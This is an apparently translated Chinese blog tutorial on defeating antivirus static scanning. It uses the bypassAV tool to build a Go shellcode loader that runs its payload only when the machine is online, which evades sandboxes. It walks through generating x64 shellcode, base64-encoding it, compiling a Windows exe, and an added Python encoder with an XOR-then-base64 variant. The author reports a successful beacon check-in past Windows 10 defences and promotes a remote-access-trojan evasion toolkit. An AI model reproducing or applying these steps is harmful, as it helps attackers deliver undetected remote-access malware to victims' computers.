Preface:
This post walks through static AV evasion with bypassAV. Old hands who have used it already can skip it. I go through the default flow here, but frankly it no longer works that well; I suggest you change its base64 encoding step to some other encoding of your own. I will first take you through the build process once, and you can modify the code later. The toolkit is linked at the end of the article.
The software used here is the first item in the screenshot (not the one the arrow points to).
Download site:
http://bai1152770445.ysepan.com/
bypassAV project used:
https://github.com/pureqh/bypassAV
Main text:
First, in the bypassAV directory we use build.py to generate a main.go file. Before generating it, change a few values inside build.py. (My copy of bypassAV lives in Kali; if you are not comfortable with vim, just edit the file on Windows first.)
Remove the trailing space at the very end of line 28 of build.py; it tends to cause errors.
Then replace the URL on line 35 of build.py with Baidu's.
That URL is a connectivity check: the generated program only runs the payload if the target machine can reach the internet, and does nothing otherwise (offline sandboxes and analysis VMs therefore never see it run).
Now generate main.go.
Once main.go is generated, generate the shellcode for the trojan.
Usable payload output formats: C, Perl, Python, Ruby, Vell; it must be x64.
I chose the Python format; pick whichever fits your needs.
From the generated output, copy out the shellcode:
buf = "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"
I am pasting it here in case some beginners do not know what it looks like.
Next we edit go_shellcode_encode.py (the file in the screenshot). Change the following:
Delete this line:
buf1 = b"shellcode"
and put the shellcode we copied in its place.
The package imported at the arrow can be deleted; in my screenshot it is already gone.
Rename buf1 here to buf. If you read code you will see why; if not, just follow along.
Save, exit, then run:
python go_shellcode_encode.py
The output is the base64-encoded shellcode; copy it out.
Finally, open main.go and paste the encoded string you just copied into the position shown in the screenshot below.
Save, then compile main.go into an exe.
This needs a Go toolchain; look up an install tutorial online. If you build from Kali rather than Windows, set GOOS=windows and GOARCH=amd64 in the environment of the go build command so it produces a 64-bit Windows executable (the payload has to be x64, so the loader must be too).
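As an added example (my own code, not the bypassAV project's go_shellcode_encode.py or build.py), here is a self-contained script that does the encoding step above: it takes the `buf` lines that the Python-format shellcode output prints, turns them into bytes, base64-encodes them, and also shows the variation I suggested at the top, XOR with a key before base64, together with the matching decoder so you can check the round trip. The sample bytes (a four-byte NOP sled and an INT3), the XOR key and the Go variable name are all constructed for the example; the generated main.go decides the real variable name and decode routine.

```python
"""Encode raw shellcode for embedding in a Go loader.

Added example, not the bypassAV project's go_shellcode_encode.py. It
reproduces the walkthrough's step (msfvenom-style python ``buf`` lines ->
bytes -> base64) and adds the XOR-then-base64 variant the post suggests,
with the matching decoder. Sample bytes are constructed (NOP sled + INT3).
"""
import base64
import re

# Constructed sample in the shape the Python shellcode format emits:
# one 'buf = b""' line followed by 'buf += b"..."' continuation lines.
SAMPLE_MSFVENOM_PY = r'''
buf =  b""
buf += b"\x90\x90\x90\x90"
buf += b"\xcc"
'''

# One 'buf = b"..."' or 'buf += b"..."' line; the b prefix is optional so the
# plain 'buf = "..."' form shown in the post is accepted as well.
_BUF_LINE = re.compile(r'^buf\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$', re.MULTILINE)


def parse_msfvenom_python(text: str) -> bytes:
    """Concatenate every buf line's \\xNN escapes into one bytes object."""
    out = bytearray()
    for m in _BUF_LINE.finditer(text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def encode_base64(shellcode: bytes) -> str:
    """The post's default: plain base64 of the raw bytes."""
    return base64.b64encode(shellcode).decode("ascii")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_xor_base64(shellcode: bytes, key: bytes) -> str:
    """The suggested variant: XOR first, then base64 the result."""
    return encode_base64(xor_bytes(shellcode, key))


def decode_xor_base64(encoded: str, key: bytes) -> bytes:
    """Inverse of encode_xor_base64; the Go loader needs the same two steps."""
    return xor_bytes(base64.b64decode(encoded), key)


def go_string_literal(encoded: str, name: str = "encoded") -> str:
    """Render the encoded text as a Go declaration for pasting into main.go.

    The variable name is a placeholder; use the name the generated main.go
    expects. Base64 output needs no escaping inside a Go string literal.
    """
    return f'var {name} = "{encoded}"'


if __name__ == "__main__":
    sc = parse_msfvenom_python(SAMPLE_MSFVENOM_PY)
    print(go_string_literal(encode_base64(sc)))
    key = b"kali"  # constructed key for the XOR variant
    enc = encode_xor_base64(sc, key)
    assert decode_xor_base64(enc, key) == sc
    print(go_string_literal(enc, "xored"))
```

Swap the sample text for the real `buf` lines and the printed declaration is what goes into main.go; if you use the XOR variant, the decode side in main.go has to base64-decode and then XOR with the same key, or the loader will execute garbage.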
Finally, I tested it against Windows 10's built-in protection: it passes static scanning, and after double-clicking, the beacon checked in successfully.
Dynamic evasion you will have to research yourselves; the moment something is published it is burned within minutes. PS: I do not know how long this static evasion will hold either, or how many AV products it gets past; test it yourselves.
Follow the official account and send the keyword
远控免杀合集 (the RAT AV-evasion collection)
to get the toolkit.
Official account: 白安全组
Website: www.wangehacker.cn